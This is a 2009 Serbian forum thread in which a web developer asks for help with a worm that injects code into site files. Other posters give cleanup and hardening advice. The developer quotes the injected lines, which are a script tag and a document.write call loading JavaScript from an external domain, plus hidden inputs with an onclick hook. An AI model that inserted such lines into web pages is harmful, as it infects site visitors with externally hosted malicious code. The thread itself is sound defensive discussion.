[ Mister_rap @ 22.10.2009. 12:18 ] @
|
| Pozdrav,
Evo upravo sam suocen sa novom varijantom crva koja napada web stranice, sada nije u pitanju iframe attack.
I nisu napadu izlozeni samo index fajlovi, vec i mnogi drugi, a koliko sam primjetio uspjesno napada sve extenzije (jsp, htm, html, phtml, php, js...).
Takodje kreira fajlove samostalno (uocio sam video_player.sfw player.swf i tako redom).
Ciscenje zarazenog sajta se prtvara u nocnu moru ako se ide rucno jer je zarazen jako velik broj fajlova.
Trazio sam po google-u ali nisam nista nasao, tako da ajde da postujem ovdje da vidim da necemo doci do nekog zajednickog resenja.
Evo sta dodaje u stranice:
Code:
<script src=http://topofthelinesunglasses.com/ext/add_checkout_success.php ></script>
Code:
document.write('<script src=http://topofthelinesunglasses.com/ext/add_checkout_success.php ><\/script>');
Pazi ovaj:
Code:
<input type="hidden" id="gwProxy"><!--Session data--></input><input type="hidden" id="jsProxy" onclick="jsCall();" />
I neke standardne enkodirane printove.
Trenutno za sada mi je prijavljen samo 1 sajt, ali ne bi me cudilo da ih bude jos.
Ono sto me zanima jeste kako se efikasno zastiti, i kako cistiti ove fajlove automatizovano!?
|
[ magna86 @ 23.10.2009. 02:10 ] @
Ja ti samo mogu pomoci ( ako treba) da zasigurno detektujes i uklonis bilo koji malware sa racunara
...a vezano za ciscenje zarazenog sajta...u to se ja nerazumem
Ako ti je ipak potrebna moja pomoc vezano za to (vezano za crv/worm)...ovo je najefikasniji nacin za proveru,pa ako ti i to treba...
*Iskljuci AntiVirus
http://www.bleepingcomputer.com/forums/topic114351.html
*Skini Combofix na Desktop
http://www.elitesecurity.org/t...e-programa-HijackThis-ComboFix
*Pokreni ga,prati uputstvo i na kraju skeniranja napravice se log (tipicna lokacija: C:\ComboFix.txt )
e..sad kao sto rekog..za ciscenje sajta...sorry
[ valjan @ 23.10.2009. 08:27 ] @
Crvi po svojoj prirodi koriste propuste u operativnim sistemima i aplikacijama. Problem kod slozenijih dinamickih websajtova je sto imas jako mnogo slojeva koje moras da stitis - najpre je tu tvoj hosting provajder (ako ne hostujes na svom serveru), i od toga koliko azurno krpi operativni sistem, sam web servis, sql server, PHP/.NET/Perl/Ruby/Javu ili sta vec tera sajt, i koliko su jake lozinke svih korisnika na sistemu (ceo sistem je bezbedan do nivoa najslabije lozinke) zavisi jedan segment bezbednosti. Ako provajder ima lenjog/nepouzdanog/neodgovornog/neobavestenog admina, menjaj ga (mislim na provajdera, ne na admina :-) ).
Zatim je tu zastita lozinki za admin autentifikaciju koje se unose direktno na sajtu ili za ftp pristup sa racunara webmastera, odnosno svih onih koji uploaduju sadrzaj na server i koji imaju admin privilegije. Kao sto smo videli proteklih nekoliko meseci, nikakva enkripcija lozinki za ftp u starim verzijama Total Commandera dovela je do masovnih iframe napada - trojanac je tiho & elegantno maznjavao lozinke sa racunara webmastera koji su koristili stare verzije TC-a, slao na odgovarajuce mesto, i onda je crvic u kratkom vremenskom roku pomocu tih lozinki odradio ostatak posla. Dakle, bez dobre visestepene AV zastite i firewalla na racunarima webmastera/administratora/ostalih kreatora sajta nema dobre prevencije.
Tu su zatim i programerske greške tipa SQL Injection, XSS Scripting i slicni propusti - ako sam pises sve od nule, onda tebi pada na grbacu da sve proveris i zakrpis (mada sada ima sve vise alata koji ti mogu pomoci u testiranju i pronalazenju ovakvih propusta), a ako koristis neki gotov CMS, onda naravno moras redovno skidati i ubacivati zakrpe (ako nema zakrpa duze vreme, pocni da razmisljas o prelasku na neki drugi CMS) ili da sam customizujes skripte, ali onda kasnije imas problema kod ubacivanja nekih novijih zakrpa. Problem je sto se ovakve vrste gresaka retko izucavaju na klasicnim programerskim kursevima, pa mnogi web programeri ni ne znaju sta je to SQL Injection ili XSS Scripting i kako ga spreciti. Na primer, vidjao sam kod ljudi koji razbijaju JavaScript, da sadrzaj nekog polja iz forme direktno utrpaju u eval() funkciju bez ikakve provere - to radi posao koji je on zamislio, ali mozes mu ukucati i koju god hoces java funkciju u to polje i bice izvrsena, a niko ih nikad nije ucio da to tako ne treba i zasto ne treba.
Ima sigurno jos stvari, ovo mi je prvo palo na pamet, a vec sam se dovoljno raspisao...
edit: zaboravih lozinke na SQL serveru - kad sam dosao u novu firmu, dva meseca sam se skoro bezuspesno borio sa trojancima i crvima dok nismo ukapirali da nam upadaju preko SQL servera, jer su ljudi pre nas ostavili blanko admin lozinku (tako im bilo lakse za izradu i odrzavanje)...
[ Mister_rap @ 23.10.2009. 11:30 ] @
Pozdrav,
Prevenstveno hvala na odgovorima.
Sa prethodnom varijantom bilo se lako izboriti, ali kao sto vec rekoh ovaj je malo napredniji.
Imajuci u vidu da web aplikacije na kojima radim imaju gomilu fajlova prilicno je nemoguce bez neke automatizacije izvsiti ciscenje.
Ovaj crv je takodje 99% upao preko ftp-a ne, premda ni hosting provajder po mom licnom misljenju ne valja nista.
Ja kao developer ne mogu puno da uticem na stvari, tako da cu vratiti backup aplikacije promjeniti lozinke i to je to, to ce defacto pomoci - uvijek pomogne ali je pitanje do kad!
Webmasteri su takodje upoznati sa tim da su oni vrlo vjerovatno nosioci virusa ali boze moj ljudski faktor u krajnjem nije moguce sprijeciti a to je ono sto ja pokusavam :D
Copyright (C) 2001-2025 by www.elitesecurity.org. All rights reserved.